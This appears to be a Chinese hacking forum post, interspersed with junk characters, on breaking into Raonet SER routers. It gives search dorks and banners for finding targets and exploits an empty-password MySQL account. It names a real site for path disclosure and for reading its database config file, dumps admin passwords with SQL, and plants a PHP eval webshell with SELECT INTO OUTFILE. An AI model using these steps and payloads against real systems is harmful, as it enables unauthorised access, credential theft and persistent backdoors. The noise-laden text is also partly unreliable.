寻找存在漏洞的路由器方法:
2 ]+ X" p$ b# F
8 j! G2 r# Y( s! I' v, ~$ |1:google搜索'Raonet Subscriber Ethernet Router'
% k0 ^; A% ] g
1 Q3 I1 w" [, ~5 F9 i( \( G2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001
# c' Q$ z3 v% F3 v. h' I3 g$ G. y, k& l( z" X& r5 J; t" \
3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。; k! a# U- A: j5 K: x2 u+ N
/ ]. I+ a& Y. S. H; ~. B6 j
//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......
( m0 O% Q* j& S1 ^" _ G/ ~2 }2 f4 K7 i. \6 G
; |3 j6 y0 \$ o' M# z
# f* Z* H% A8 W" G! R R L$ Y入侵步骤:3 y6 o' \' j4 |
. n* O8 g" W3 p$ a3 A" z
1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php5 a a' K- `3 g: g$ L0 S7 f8 l! K
# n e: I! f# y$ Y1 _3 i/ @
2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc
% a K2 W% `9 S0 r# W) B3 S3:得到密码后连接,查看GUI管理密码:% X( l' n! G/ u2 I7 L% i; X
use ser_500# J# E* W) T& [( A+ {
select id,passwd from user;8 D4 H) W" A4 F: { w$ ?& u
4:通过数据库写入webshell,执行命令:0 E9 N; y! U) x1 I" v4 F! X: O
use mysql;
, @. i c9 m7 j* }, kcreate table ok(cmd TEXT);3 w1 K, x% K( T) [
insert into ok values("<?php @eval($_POST[cmd])?>");: I- `' e" P9 [ l
select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";+ s w* N$ O" M/ @1 O p9 _
drop table ok;' k: a# R$ h) G
) t+ u K# R, G8 G# i7 Q5:连接后门shell.php ! t7 t; ~4 X' F+ A1 ]6 m9 p& f" q# h
/ k( g/ y% D. k# I
6. 搞定!
$ O, ^: r: L# t! j& }/ W; C T0 T" w! I5 s
|